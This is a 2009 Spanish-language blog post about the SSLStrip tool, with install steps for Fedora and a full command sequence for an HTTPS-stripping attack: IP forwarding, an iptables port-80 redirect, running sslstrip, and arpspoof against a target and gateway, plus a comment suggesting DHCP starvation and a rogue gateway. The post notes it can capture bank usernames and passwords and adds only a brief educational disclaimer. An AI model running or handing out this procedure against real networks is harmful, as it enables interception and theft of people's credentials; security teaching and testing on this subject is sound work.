martes, 27 de octubre de 2009

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.

Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:

Python >= 2.4
yum -y install python

Python "twisted-web"
yum -y install python-twisted-web

Arpspoof
yum -y install dsniff

Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install


Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]

Ejecutamos sslstrip.
sslstrip.py -l [listenPort]

Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]

Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.

Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.

[Sitio de SSLStrip]

3 comentarios:

tonymoyoy dijo...

cool, mas info en el podcast de Security Now 217 twit.tv/sn217

Alfredo dijo...

ese ataque funciona mejor si saturas el DHCP y montas un DHCP en el que te pongas como GATEWAY asi es un ataque de MAN-IN-THE-MIDDLE por completo.

Saludos :D

[Israel] dijo...

Yep, pero en caso de IP estaticas utilizas el ArpSpoof :D.
Recuerden niños, es solo informativo.